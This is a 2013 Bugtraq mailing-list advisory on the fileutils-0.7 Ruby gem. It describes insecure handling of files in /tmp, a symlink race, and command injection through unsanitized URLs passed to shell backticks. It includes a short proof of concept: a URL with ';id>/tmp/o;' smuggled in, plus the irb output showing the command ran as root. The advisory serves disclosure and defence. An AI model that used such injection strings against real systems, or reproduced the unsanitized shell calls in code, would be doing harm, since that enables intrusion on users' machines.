[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Fileutils ruby gem possible remote command execution and insecure file handling in /tmp
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: Fileutils ruby gem possible remote command execution and insecure file handling in /tmp
- From: larry0@xxxxxx
- Date: Thu, 28 Feb 2013 18:11:01 GMT
Fileutils ruby gem possible remote command execution and insecure file handling
in /tmp
2/23/2013
Hi list, I was looking at some gem files and noticed a few issues with
fileutils-0.7
http://rubygems.org/gems/fileutils
"A set of utility classes to extract meta data from different file types".
Handles files insecurely in /tmp, a directory is created for that file
extension say 'zip' and files are created/modified there. This directory can be
hijacked and the contents manipulated by a malicious user.
in ./lib/file_utils.rb
15 def zip (target, *sources)
16 targetdir = "{FileUtils::Config.tmp_dir}/zip"
17 id = 1
18 while File.exists?(targetdir)
19 targetdir = "{FileUtils::Config.tmp_dir}/zip#{id}"
20 id += 1
21 end
22 FileUtils.mkdir(targetdir)
where Config.tmp_dir = /tmp
in ./lib/file_utils/config.rb
5 def self.tmp_dir
6 @tmp_dir ||= '/tmp'
7 end
Remote command execution:
From file_utils.rb, doesn't sanitize input on URLs passed to CutyCapt for
execution. If a URL contains shell characters say a ';' followed by a command a
remote attacker execute a command on the clients system if they are enticed to
click an encoded url like:
need to test URL encoding not sure if this is valid.
http://bla.net.org;id>/tmp/o; -> http://tinyurl.com/a5scxzz
7 def capture (url, target)
8 command = FileUtils::Config::Xvfb.command(File.dirname(__FILE__) +
"/../bin/CutyCapt --min-width=1024 --min-height=768 --url={url} --out={target}")
9 `#{command}`
10 end
partial PoC if client is tricked into using malicious URL:
irb(main):001:0> `xvfb-run --server-args="-screen 0,1024x768x24" ./CutyCapt
--url=http://www.example.org;id>/tmp/foo; --out=/tmp/tempf` xvfb-run: error:
Xvfb failed to start
sh: 1: --out=/tmp/tempf: not found
=> ""
irb(main):002:0>
root@ubuntu:~/CutyCapt/cutycapt/CutyCapt ls -l /tmp/foo
-rw-r--r-- 1 root root 39 Feb 27 02:56 /tmp/foo
root@ubuntu:~/CutyCapt/cutycapt/CutyCapt cat /tmp/foo
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:~/CutyCapt/cutycapt/CutyCapt#
Michael Scherer of Redhat.com found other issues during a discussion about the
above issues I found:
In fact, there is the same similar problem in another file :
result = `#{FileUtils::Config::OpenOffice.python} #{command} #{source}
#{target} #{FileUtils::Config::OpenOffice.port}`
I quickly checked using irb ( a quick command line to type ruby snippet, and
yes, using funky chars result in funky results.
There is another issue in
# Generates a temp filepath for the given extension def temp (extension)
path = "{FileUtils::Config.tmp_dir}/tmp.{extension}" id = 1
while File.exists?(path)
path = "{FileUtils::Config.tmp_dir}/tmp.{id}.#{extension}"
id += 1
end
Since someone could just create the file at the last moment, and make a link so
the script would overwrite an arbitrary file.
Thanks to vl4dz and Michael.
Larry W. Cashdollar @_larry0
http://vapid.dhs.org